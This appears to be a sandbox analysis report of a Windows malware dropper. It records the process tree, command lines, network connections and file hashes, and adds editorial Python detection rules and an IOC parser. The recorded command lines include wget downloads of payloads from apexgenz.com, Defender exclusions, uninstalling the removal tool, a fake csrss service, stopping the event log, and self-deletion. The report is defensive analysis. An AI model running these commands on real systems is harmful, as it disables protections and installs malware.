PID 4388 wrote to memory of 836 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 4388 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4388 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4388 wrote to memory of 4440 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4388 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4440 wrote to memory of 1620 N/A C:\Users\Admin\AppData\Roaming\services\plugin0222 C:\Users\Admin\AppData\Roaming\services\plugin0222
PID 4388 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 4388 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 4388 wrote to memory of 1828 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\winrar.exe
PID 4388 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\2plugin2901
PID 4388 wrote to memory of 4036 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\2plugin2901
PID 4388 wrote to memory of 164 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 164 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4388 wrote to memory of 164 N/A C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe C:\Users\Admin\AppData\Roaming\services\wget.exe
PID 4544 wrote to memory of 196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 4544 wrote to memory of 196 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wusa.exe
PID 1536 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 1536 wrote to memory of 3924 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 2928 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 196 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 196 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 196 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 196 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe
PID 4352 wrote to memory of 196 N/A C:\ProgramData\SystemFiles\csrss.exe C:\Windows\system32\conhost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

"C:\Users\Admin\AppData\Roaming\services\Launhcer.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

"C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\plugin0222

C:\Users\Admin\AppData\Roaming\services\plugin0222

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/2/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\plugin0222

"C:\Users\Admin\AppData\Roaming\services\plugin0222"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 580

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\02plugins*.* "2plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\2plugin2901

C:\Users\Admin\AppData\Roaming\services\2plugin2901

C:\Users\Admin\AppData\Roaming\services\wget.exe

"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/3/1 -P C:\Users\Admin\AppData\Roaming\services

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "csrss"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "csrss"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\ProgramData\SystemFiles\csrss.exe

C:\ProgramData\SystemFiles\csrss.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

conhost.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Users\Admin\AppData\Roaming\services\winrar.exe

"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\03plugins*.* "3plugin*" C:\Users\Admin\AppData\Roaming\services

C:\Users\Admin\AppData\Roaming\services\3plugin0222

C:\Users\Admin\AppData\Roaming\services\3plugin0222

C:\Users\Admin\AppData\Roaming\services\3plugin0222

"C:\Users\Admin\AppData\Roaming\services\3plugin0222"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
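
The process list above is, read in order, a complete infection chain: a UAC prompt re-issued in a loop until the user accepts, Defender exclusions for the staging folders, payload download with a dropped wget, extraction of password-protected archives with a relocated WinRAR, removal of the Malicious Software Removal Tool, a service named csrss pointing into ProgramData, the Event Log service stopped, and cleanup of the staging directory. The following Python is an added editorial example, not part of the sandbox output, that turns those command lines into detection rules a practitioner can run over Sysmon Event ID 1 or Security 4688 CommandLine fields. The ATT&CK mapping is the editor's own reading and is an assumption; the sample command lines are copied from the Processes list, the benign lines are constructed.

```python
"""Added editorial example: classify process command lines against the
defence-evasion and persistence tradecraft recorded in the Processes list
above. Not part of the sandbox output. The ATT&CK mapping is the editor's
own reading and is an assumption; review it before reuse.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    attack_id: str
    technique: str
    cmdline: str


# (ATT&CK ID, description, pattern). Case-insensitive, tolerant of quoting
# and of the path prefix in front of the executable name.
RULES = [
    ("T1562.001", "Defender exclusion added via Add-MpPreference",
     re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Extension|Process)", re.I)),
    ("T1562.001", "Malicious Software Removal Tool uninstalled (wusa /uninstall /kb:890830)",
     re.compile(r"\bwusa(?:\.exe)?\s+/uninstall\s+/kb:890830", re.I)),
    ("T1562.002", "Windows Event Log service stopped",
     re.compile(r"\bsc(?:\.exe)?\s+stop\s+\"?eventlog\b", re.I)),
    ("T1543.003", "Service named after a system process with a binary outside System32",
     re.compile(r"\bsc(?:\.exe)?\s+create\s+\"?(?:csrss|smss|lsass|winlogon|svchost)\b\"?\s+"
                r"binpath=\s*\"?(?!c:\\windows\\system32\\)", re.I)),
    ("T1140", "Password-protected archive extracted with a relocated WinRAR",
     re.compile(r"winrar(?:\.exe)?\"?\s+x\s.*\s-p\S+", re.I)),
    ("T1105", "Payload fetched over HTTP with a dropped wget binary",
     re.compile(r"\bwget(?:\.exe)?\"?\s.*https?://", re.I)),
    ("T1548.002", "Elevation prompt re-issued in a loop until the user accepts",
     re.compile(r"while\s*\(\s*\$true\s*\).*Start-Process\b.*-Verb\s+RunAs", re.I)),
    ("T1070.004", "Delayed self-deletion (choice ... & del)",
     re.compile(r"\bchoice\s+/C\s+Y\s+/N\s+/D\s+Y\s+/T\s+\d+\s*&\s*del\b", re.I)),
    # Low confidence on its own: legitimate scripts also use rd /s /q.
    ("T1070.004", "Staging directory removed with rd /s /q",
     re.compile(r"\brd\s+/s\s+/q\s+", re.I)),
]


def classify(cmdline: str) -> list[Finding]:
    """Every rule a single command line trips; one line can trip several."""
    return [Finding(tid, name, cmdline) for tid, name, rx in RULES if rx.search(cmdline)]


def techniques_seen(cmdlines) -> dict[str, list[str]]:
    """ATT&CK ID -> matching command lines, across a whole process list."""
    seen: dict[str, list[str]] = {}
    for cmd in cmdlines:
        for f in classify(cmd):
            seen.setdefault(f.attack_id, []).append(cmd)
    return seen


# Command lines copied from the Processes list of this report (not constructed).
REPORT_CMDLINES = [
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"''',
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "',
    r'"C:\Users\Admin\AppData\Roaming\services\wget.exe" ping --content-disposition http://apexgenz.com/1/1 -P C:\Users\Admin\AppData\Roaming\services',
    r'"C:\Users\Admin\AppData\Roaming\services\winrar.exe" x -y -pjryj2023 C:\Users\Admin\AppData\Roaming\services\01plugins*.* "plugin*" C:\Users\Admin\AppData\Roaming\services',
    r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force",
    r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart",
    r'C:\Windows\system32\sc.exe create "csrss" binpath= "C:\ProgramData\SystemFiles\csrss.exe" start= "auto"',
    r"C:\Windows\system32\sc.exe stop eventlog",
    r'C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\services\2plugin2901"',
    r'"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT',
]

# Constructed benign lines, to show the rules stay quiet on ordinary use.
BENIGN_CMDLINES = [
    r'"C:\Program Files\WinRAR\WinRAR.exe" x -y C:\Users\Admin\Downloads\report.rar C:\Users\Admin\Documents',
    r"C:\Windows\system32\sc.exe query eventlog",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Get-MpPreference",
]

if __name__ == "__main__":
    for tid, cmds in techniques_seen(REPORT_CMDLINES).items():
        print(tid, len(cmds))
```

The service rule deliberately keys on the name/location mismatch rather than on "csrss" alone, since the real csrss.exe is never registered as a service from ProgramData. The rd /s /q rule is a weak indicator by itself and is worth keeping only when another rule fires in the same process tree, as it does here.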

Network

Country Destination Domain Proto
US 8.8.8.8:53 apexgenz.com udp
NL 185.14.29.199:80 apexgenz.com tcp
US 8.8.8.8:53 solvadordali.com udp
US 8.8.8.8:53 199.29.14.185.in-addr.arpa udp
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
NL 185.14.29.199:80 solvadordali.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 apexgenz.com udp
NL 185.14.29.199:80 apexgenz.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 194.87.31.18:3333 tcp
US 8.8.8.8:53 18.31.87.194.in-addr.arpa udp
US 8.8.8.8:53 mezla.site udp
NL 185.209.162.106:80 mezla.site tcp
US 8.8.8.8:53 106.162.209.185.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
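
Not every row in the table above is an indicator: the 8.8.8.8:53 rows are the sandbox resolving names, the in-addr.arpa rows are reverse lookups the analysis VM issued, and raw.githubusercontent.com / api.ip.sb are shared services that a block rule would hit legitimate traffic on. The one row with no Domain column, 194.87.31.18:3333, is a direct-to-IP connection on a port conventionally used by stratum mining pools, which lines up with the xmrig tag on this sample. The following Python is an added editorial example, not part of the sandbox output, that parses the flattened table (including the ragged row) and splits it into blockable indicators and lower-confidence context. The rows are copied from the table above; the allowlist of shared services and the list of mining-pool ports are the editor's assumptions.

```python
"""Added editorial example: turn the flattened Network table above into a
reviewable IOC set. Not part of the sandbox output. The allowlist of shared
services and the list of mining-pool ports are the editor's assumptions.
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass

# Rows copied from the Network table above (not constructed). The row for
# 194.87.31.18:3333 has no Domain column; the parser must tolerate that.
NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 apexgenz.com udp
NL 185.14.29.199:80 apexgenz.com tcp
US 8.8.8.8:53 solvadordali.com udp
US 8.8.8.8:53 199.29.14.185.in-addr.arpa udp
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
NL 185.14.29.199:80 solvadordali.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 apexgenz.com udp
NL 185.14.29.199:80 apexgenz.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
NL 194.87.31.18:3333 tcp
US 8.8.8.8:53 18.31.87.194.in-addr.arpa udp
US 8.8.8.8:53 mezla.site udp
NL 185.209.162.106:80 mezla.site tcp
US 8.8.8.8:53 106.162.209.185.in-addr.arpa udp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.13.31:443 api.ip.sb tcp
US 8.8.8.8:53 31.13.26.104.in-addr.arpa udp
"""

SANDBOX_RESOLVER = "8.8.8.8"  # the analysis VM's DNS server, not attacker infrastructure
SHARED_SERVICES = {"raw.githubusercontent.com", "api.ip.sb"}  # assumption: context, not a block rule
MINING_PORTS = {3333, 4444, 5555, 7777, 14444}  # assumption: ports commonly used by stratum pools


@dataclass(frozen=True)
class Row:
    country: str
    ip: str
    port: int
    domain: str | None
    proto: str


def parse_rows(table: str) -> list[Row]:
    """Parse the whitespace-separated table; the Domain column may be absent."""
    rows: list[Row] = []
    for line in table.splitlines()[1:]:  # first line is the header
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:  # direct-to-IP connection, no name was resolved
            country, dest, proto = parts
            domain = None
        else:
            raise ValueError(f"unexpected row: {line!r}")
        ip, port = dest.rsplit(":", 1)
        ipaddress.ip_address(ip)  # raises on anything that is not an address
        rows.append(Row(country, ip, int(port), domain, proto))
    return rows


def extract_iocs(rows: list[Row]) -> dict[str, list[str]]:
    """Split observations into blockable indicators and lower-confidence context."""
    domains: set[str] = set()
    ips: set[str] = set()
    low: set[str] = set()
    mining: set[str] = set()
    for r in rows:
        if r.domain and r.domain.endswith(".in-addr.arpa"):
            continue  # reverse lookups issued by the sandbox itself
        if r.ip == SANDBOX_RESOLVER:
            # A DNS query: the queried name is the indicator, the resolver is not.
            if r.domain in SHARED_SERVICES:
                low.add(r.domain)
            elif r.domain:
                domains.add(r.domain)
            continue
        if r.domain in SHARED_SERVICES:
            low.update({r.domain, r.ip})  # CDN / shared hosting, keep as context only
            continue
        ips.add(r.ip)
        if r.domain:
            domains.add(r.domain)
        if r.port in MINING_PORTS:
            mining.add(f"{r.ip}:{r.port}")
    return {
        "domains": sorted(domains),
        "ips": sorted(ips),
        "low_confidence": sorted(low),
        "mining_endpoints": sorted(mining),
    }


if __name__ == "__main__":
    for kind, values in extract_iocs(parse_rows(NETWORK_TABLE)).items():
        print(kind, values)
```

The same split applies to the other behavioral runs in this report: the resolver and PTR rows never belong in a blocklist, and a direct-to-IP connection on a mining port with no DNS name in front of it is the strongest single indicator a network team can take from the table.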

Files

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe

MD5 e5c00b0bc45281666afd14eef04252b2
SHA1 3b6eecf8250e88169976a5f866d15c60ee66b758
SHA256 542e2ebbded3ef0c43551fb56ce44d4dbb36a507c2a801c0815c79d9f5e0f903
SHA512 2bacd4e1c584565dfd5e06e492b0122860bfc3b0cc1543e6baded490535309834e0d5bb760f65dbfb19a9bb0beddb27a216c605bbed828810a480c8cd1fba387

C:\Users\Admin\AppData\Roaming\services\Launhcer.dll

MD5 7de0541eb96ba31067b4c58d9399693b
SHA1 a105216391bd53fa0c8f6aa23953030d0c0f9244
SHA256 934f75c8443d6379abdc380477a87ef6531d0429de8d8f31cd6b62f55a978f6e
SHA512 e5ffa3bfd19b4d69c8b4db0aabaf835810b8b8cccd7bc400c7ba90ef5f5ebd745c2619c9a3e83aa6b628d9cf765510c471a2ff8cb6aa5ad4cf3f7826f6ae84a3

C:\Users\Admin\AppData\Roaming\services\Launhcer.exe.manifest

MD5 f0fc065f7fd974b42093594a58a4baef
SHA1 dbf28dd15d4aa338014c9e508a880e893c548d00
SHA256 d6e1c130f3c31258b4f6ff2e5d67bb838b65281af397a11d7eb35a7313993693
SHA512 8bd26de4f9b8e7b6fe9c42f44b548121d033f27272f1da4c340f81aa5642adc17bb9b092ece12bb8515460b9c432bf3b3b7b70f87d4beb6c491d3d0dfb5b71fe

memory/3436-17-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/3436-16-0x0000000004B90000-0x0000000004BC6000-memory.dmp

memory/3436-18-0x0000000004AA0000-0x0000000004AB0000-memory.dmp

memory/3436-19-0x0000000004AA0000-0x0000000004AB0000-memory.dmp

memory/3436-20-0x0000000007560000-0x0000000007B88000-memory.dmp

memory/3436-21-0x0000000007C20000-0x0000000007C42000-memory.dmp

memory/3436-22-0x0000000007CC0000-0x0000000007D26000-memory.dmp

memory/3436-23-0x0000000007EA0000-0x0000000007F06000-memory.dmp

memory/3436-24-0x0000000007F10000-0x0000000008260000-memory.dmp

memory/3436-25-0x0000000008280000-0x000000000829C000-memory.dmp

memory/3436-26-0x00000000083E0000-0x000000000842B000-memory.dmp

memory/3436-27-0x0000000008680000-0x00000000086F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5rnaqad.kvf.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3436-42-0x0000000009760000-0x00000000097F4000-memory.dmp

memory/3436-43-0x00000000096E0000-0x00000000096FA000-memory.dmp

memory/3436-44-0x0000000009730000-0x0000000009752000-memory.dmp

memory/3436-45-0x0000000009D00000-0x000000000A1FE000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe

MD5 fea10d11d84919cb9a0a0752d61c0a66
SHA1 aea3c65e2b62851b2dd112597f28379b49c58a0a
SHA256 2786febdd57874118eaf5e257382cf4467d43f9ca189ac48ff6d45494f1cbab7
SHA512 e382f79ec1f1c370cd0053cccc7a0db8f3dc28b22f9dacd5f425c60adfb21e4a6eed3e119a7f9bbf135839e22d46511ca793cf8b5118d0e6256ebbbe749fc508

C:\Users\Admin\AppData\Roaming\services\data\Launcher.dll

MD5 f58866e5a48d89c883f3932c279004db
SHA1 e72182e9ee4738577b01359f5acbfbbe8daa2b7f
SHA256 d6f3e13dfff0a116190504efbfcbcd68f5d2183e6f89fd4c860360fba0ec8c12
SHA512 7e76555e62281d355c2346177f60bfe2dc433145037a34cfc2f5848509401768b4db3a9fd2f6e1a1d69c5341db6a0b956abf4d975f28ee4262f1443b192fe177

C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe.manifest

MD5 1b6de83d3f1ccabf195a98a2972c366a
SHA1 09f03658306c4078b75fa648d763df9cddd62f23
SHA256 e20486518d09caf6778ed0d60aab51bb3c8b1a498fd4ede3c238ee1823676724
SHA512 e171a7f2431cfe0d3dfbd73e6ea0fc9bd3e5efefc1fbdeff517f74b9d78679913c4a60c57dde75e4a605c288bc2b87b9bb54b0532e67758dfb4a2ac8aea440ce

memory/4664-56-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/4664-57-0x0000000006890000-0x00000000068A0000-memory.dmp

memory/4664-58-0x0000000006890000-0x00000000068A0000-memory.dmp

memory/4664-75-0x000000007EE30000-0x000000007EE40000-memory.dmp

memory/4664-76-0x00000000090F0000-0x0000000009123000-memory.dmp

memory/4664-77-0x000000006F380000-0x000000006F3CB000-memory.dmp

memory/4664-78-0x00000000090D0000-0x00000000090EE000-memory.dmp

memory/4664-83-0x0000000009140000-0x00000000091E5000-memory.dmp

memory/4664-84-0x0000000006890000-0x00000000068A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\wget.exe

MD5 8c04808e4ba12cb793cf661fbbf6c2a0
SHA1 bdfdb50c5f251628c332042f85e8dd8cf5f650e3
SHA256 a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272
SHA512 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

memory/4664-279-0x00000000093A0000-0x00000000093BA000-memory.dmp

memory/4664-284-0x0000000009390000-0x0000000009398000-memory.dmp

memory/4664-300-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/2476-303-0x0000000000400000-0x00000000008F2000-memory.dmp

memory/3436-304-0x00000000725E0000-0x0000000072CCE000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\winrar.exe

MD5 f59f4f7bea12dd7c8d44f0a717c21c8e
SHA1 17629ccb3bd555b72a4432876145707613100b3e
SHA256 f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4
SHA512 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

C:\Users\Admin\AppData\Roaming\services\01plugins0222.rar

MD5 192ea396deb46406bed716cde8b0fda6
SHA1 b48459b0e4f8d712150c2db39764d3658678f8ac
SHA256 c56f6db940d4802fce1621bd03c3563869acc5ccf2f8fc7ef6a4cc5d17e0c04d
SHA512 359fb7a51a6524e5fab57de6b799082e3c9d0582cf0a01a5535d11c02c09803a59da47c5a1d65d6306631fa31e4eb8a03479aec5c877d7e4157f3c60ebeda6e1

memory/3436-311-0x0000000004AA0000-0x0000000004AB0000-memory.dmp

C:\Users\Admin\AppData\Roaming\services\plugin0222

MD5 17d804b82a9cae6218607478d6213aae
SHA1 f5ff7adb303f6dfe07a86f0dc58ae3d2dd3c3b6f
SHA256 506c268dd0361e0bec3f2da64ba330cb56ea566fa3a1a6360519b9844ec6cddd
SHA512 ce0983032550ea02b685b132ccc29d2263fbdd189a36bbd89bd9af44fdc5ce1c2446b4ea6af67ceb474880386b1a3ada33aea9ac157a029e15b55e49e39067a8

memory/4440-315-0x0000000000EE0000-0x0000000000F68000-memory.dmp

memory/4440-316-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/3436-318-0x0000000004AA0000-0x0000000004AB0000-memory.dmp

memory/4440-319-0x0000000005770000-0x0000000005780000-memory.dmp

memory/1620-320-0x0000000000400000-0x000000000046D000-memory.dmp

memory/4440-324-0x00000000725E0000-0x0000000072CCE000-memory.dmp

memory/1620-325-0x0000000000400000-0x000000000046D000-memory.dmp

memory/1620-323-0x0000000000400000-0x000000000046D000-memory.dmp

memory/1620-327-0x0000000000400000-0x000000000046D000-memory.dmp

memory/4220-331-0x0000000000400000-0x00000000008F2000-memory.dmp

C:\Users\Admin\AppData\Roaming\WinRAR\version.dat

MD5 5a7358d53674902c204c6fb1e21c78e4
SHA1 1a19c63d8e832037e6b8a2ac956f5541c4efd500
SHA256 1eaefc76658bbbfd2b00154813221e361d1fc615ce5636061d2e9a9d97c5cddb
SHA512 f5d16f554634239f4149cbd514cf13dc51080e6fb80f94d07a13afd3dfa00d03cd5bde72493be120451f004aececb350ac0bcf70ae762c404da3773a42f0a3dd

C:\Users\Admin\AppData\Roaming\services\02plugins2901.rar

MD5 82a56a666981e9e163a1aba74dc70aa8
SHA1 709e44e71ff38d0771d839b74f270c23daa42f64
